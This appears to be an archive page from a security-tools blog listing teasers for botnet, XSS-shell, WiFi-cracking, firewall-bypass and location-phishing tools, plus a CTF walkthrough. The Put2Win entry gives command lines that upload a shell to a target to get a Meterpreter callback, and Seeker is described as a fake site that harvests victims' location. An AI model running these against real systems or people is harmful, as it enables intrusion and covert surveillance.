PRINT
PRINT
SEND MAIL
SEND MAIL

Month: September 2018

NEW TOOLSMacFuzzerKemon

Kemon – An Open-Source Pre And Post Callback-Based Framework For macOS Kernel Monitoring

by Black Hat Sec

An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring.What is Kemon?An open-source Pre and Post callback-based framework for macOS kernel monitoring. With the power of Kemon, we can easily implement LPC communication monitoring, MAC policy filtering, kernel driver firewall, etc. In general, from an attacker's perspective, this framework can help achieve more powerful Rootkit. From the perspective of defense, Kemon can help construct more granular monitoring capabilities. I also implemented a kernel fuzzer through this framework, which helped me find many vulnerabilities,…

Read More Kemon – An Open-Source Pre And Post Callback-Based Framework For macOS Kernel Monitoring
NEW TOOLSScanRemote Code ExecutionShellsRATAntivirus EvasionSnifferAntiforensicsBYOBEmail SenderPortscannerWebcam Capture

BYOB – Build Your Own Botnet

by Black Hat Sec

BYOB (Build Your Own Botnet)Disclaimer: This project should be used for authorized testing or educational purposes only.BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats.It is designed to allow developers to easily implement their own code and add cool new features…

Read More BYOB – Build Your Own Botnet
NEW TOOLSMacAircrack-ngAircrackWifi CrackerWireless Attack ToolkitWireless AuditingWiFi ScannerWifi Security Tool

Aircrack-ng 1.4 – Complete Suite Of Tools To Assess WiFi Network Security

by Black Hat Sec

Aircrack-ng is a complete suite of tools to assess WiFi network security.It focuses on different areas of WiFi security:Monitoring: Packet capture and export of data to text files for further processing by third party tools.Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.Testing: Checking WiFi cards and driver capabilities (capture and injection).Cracking: WEP and WPA PSK (WPA 1 and 2).All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily…

Read More Aircrack-ng 1.4 – Complete Suite Of Tools To Assess WiFi Network Security
NEW TOOLSJavaScriptNetcatXSSJShellXSS Shell

JShell – Get A JavaScript Shell With XSS

by Black Hat Sec

JShell - Get a JavaScript shell with XSS.UsagesRun shell.pyand JShell will automatically try to detect your IP address, default LPORT is 33.As you can see the payload has been generated and now all you have to do is to deliver this payload to the victim.As soon as you do that, you will get a JS shell over netcat where you can execute your JavaScript code in victim's browser as soon as the injected page is open.Here's a screenshot:Credits, Disclaimer & LicenseThis script uses the…

Read More JShell – Get A JavaScript Shell With XSS
NEW TOOLSPHPGeolocationAccuracyAltitudeLatitudeLongitudeSeekerSystem Information

Seeker v1.0.7 – Get Accurate Location using a Fake Website

by Black Hat Sec

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your loction just like many popular location based websites.Seeker Hosts a fake website on Apache Server and uses Ngrok, website asks for Location Permission and if the user allows it, we can get :LongitudeLatitudeAccuracyAltitude - Not always availableDirection - Only available if user is movingSpeed - Only available if user is movingAlong with Location Information we also get Device Information without any…

Read More Seeker v1.0.7 – Get Accurate Location using a Fake Website
NEW TOOLSMacNmapHTTPPUT MethodPut2Win

Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter

by Black Hat Sec

Script to automatize shell upload by PUT HTTP method to get meterpreter.DependenciesIt's necessary to have installed nmap and msfvenom tools for a correct operationInstallationgit clone -hThis script automatize shell upload by PUT HTTP method to get meterpreter.Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOSTExamples:./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10ContactTelegram: @devploitTwitter: Put2Win

Read More Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter
NEW TOOLSMacMITMWifiVirtual MachineUDPConversationsUdp2raw-tunnel

Udp2raw-tunnel – A UDP Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket [Bypass UDP FireWalls]

by Black Hat Sec

A UDP Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket, helps you Bypass UDP FireWalls (or Unstable UDP Environment). Its Encrypted, Anti-Replay and Multiplexed.It also acts as a Connection Stabilizer.Support PlatformsA Linux host (including desktop Linux, Android phone/tablet, OpenWRT router, or Raspberry PI) with root access.For Winodws/MacOS, a virtual image with udp2raw pre-installed has been released, you can load it with Vmware/VirtualBox.The virtual image has been set to auto obtain ip, udp2raw can be run immediately after boot finished(make sure network mode of…

Read More Udp2raw-tunnel – A UDP Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket [Bypass UDP FireWalls]
NEW TOOLSRemote AccessSecurity AssessmentjavaTesting FrameworkDrozer

Drozer v2.4.4 – The Leading Security Assessment Framework For Android

by Black Hat Sec

drozer (formerly Mercury) is the leading security testing framework for Android.drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR's advanced exploitation payload) drozer is able to maximise the permissions…

Read More Drozer v2.4.4 – The Leading Security Assessment Framework For Android
TUTORIALSCTF Challenges

Hack the Gemini inc:2 (CTF Challenge)

by Black Hat Sec

Hello Friends!! Today we are going to breach a new VM lab “Gemini inc:2” of the vulnhub series and before moving ahead you can also take a  look over Gemini inc:1 which we had solved earlier. Gemini Inc has contacted you to perform a penetration testing on one of their internal system. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege.…

Read More Hack the Gemini inc:2 (CTF Challenge)